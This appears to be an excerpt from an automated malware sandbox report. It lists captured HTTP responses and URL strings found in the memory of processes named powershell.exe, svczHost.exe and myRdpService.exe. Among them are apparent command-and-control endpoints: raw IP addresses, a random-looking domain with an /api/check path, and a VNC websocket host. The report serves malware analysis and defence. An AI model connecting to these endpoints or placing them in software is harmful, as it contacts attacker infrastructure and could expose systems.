      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g5dPlBwFblwAGbz4w0jYXFHXanITC3oHmFbGbunGezunV61Ejpc3R%2FOyw2H7sKiDqEO42V83hLCRkJuzsMUVQoz2HyXF6aivaEeU79KM1SsVMbQaC1PVRpxLOZp0vmI83QgN2DcngBZ%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4a4a528991e32-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14994&sent=1249&recv=541&lost=0&retrans=0&sent_bytes=1128628&recv_bytes=60911&delivery_rate=1839452&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:47:42 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1MUB39f9r6LQ2YHeab%2FXX25xVfruMpa%2F4XaSPMvuPbqWxeaoZEo5q62WQ7osZ%2FrtbjYF%2BtO%2BUIE5zIUkrPuZuO1vj%2F%2FKkuvudkGkXqT48sApL9JtfQ7MpM7Crx%2Bi9dgmbaufbw5pDq0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4a4b8fcf4819e-SINalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7185&sent=495&recv=339&lost=0&retrans=0&sent_bytes=433286&recv_bytes=35809&delivery_rate=7209876&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:47:45 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;}
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rop%2FCed%2FFQGPgIZEk2%2Boqp7AlNkVSh9Zv7BLcpBh3M7N1E1xDUMoXKsx8yzOyTrkOJp0AAeA9xFwdXr9M1ks%2BPS%2Fbh63mQ1A9KS81DKixh%2F0WrqzMqwzf%2F7fmitYlPBFTYMnGtS80aOR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4a5074fc422bd-CDGalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=26042&sent=1084&recv=425&lost=0&retrans=0&sent_bytes=946045&recv_bytes=51116&delivery_rate=711302&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:47:57 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;}
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
      Source: myRdpService.exe, 0000002C.00000002.4247779942.000002DE26D99000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://206.206.126.252:8008/
      Source: myRdpService.exe, 0000002C.00000002.4247779942.000002DE26D99000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://23.88.71.29:8000/
      Source: powershell.exe, 00000002.00000002.3102606036.000001B41CAC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3048021778.0000014074BF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3856781463.000001F1DC552000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4254208593.0000019BF2770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3858427512.000002B47A7D6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3731828816.0000021EF660B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4227672039.00000248F5672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000002.00000002.3186708353.000001B436B50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3048021778.0000014074BF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3856781463.000001F1DC552000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4254208593.0000019BF2770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3858427512.000002B47A7D6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3731828816.0000021EF660B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4227672039.00000248F5672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000007.00000002.3051426177.0000014075047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
      Source: powershell.exe, 00000007.00000002.3051426177.0000014075047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof9
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
      Source: powershell.exe, 00000002.00000002.3178404159.000001B42EC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3178404159.000001B42EAB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014001650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3040028318.000001401007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472714000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3680286724.0000021E901FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.00000248814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4628D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: powershell.exe, 00000007.00000002.3008017548.00000140014FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140014D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.cl
      Source: powershell.exe, 00000007.00000002.3051426177.0000014075047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlforma
      Source: powershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlfw
      Source: powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C49C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80D7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: svczHost.exe, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C4521000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4626A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C49C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80D7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C5D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com
      Source: svczHost.exe, 00000013.00000002.4247349250.0000015B5E806000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com/api/check(/
      Source: svczHost.exe, 00000013.00000002.4247349250.0000015B5E8B3000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4247349250.0000015B5E8A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com:443/x
      Source: myRdpService.exe, 0000002C.00000002.4247779942.000002DE26D99000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vnc.chatelement.online:80/client/ws
      Source: powershell.exe, 00000007.00000002.3008017548.0000014001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4628D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: powershell.exe, 00000007.00000002.3008017548.00000140014FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140014D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
      Source: myRdpService.exe, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4246218378.000002DE23B69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
      Source: svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.gstatic.com/generate_204y
      Source: myRdpService.exe, 0000002C.00000002.4247779942.000002DE26D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com:80/
      Source: powershell.exe, 00000007.00000002.3051426177.00000140750BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000007.00000002.3051426177.00000140750BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c10-1HtUu
      Source: powershell.exe, 0000001B.00000002.3749855601.0000021EF67A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coo4
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3715659309.000001F1D45A7000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4256098800.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5F248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000000.3904011963.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: svczHost.exe, myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-c
      Source: myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C4521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4626A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000001B.00000002.3390080505.0000021E81144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C50FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXz
      Source: powershell.exe, 0000001B.00000002.3390080505.0000021E81144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelph
      Source: powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: svczHost.exe, 00000013.00000002.4248447361.0000015B5F248000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000000.3904011963.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/MartinKuschnik/WmiLight
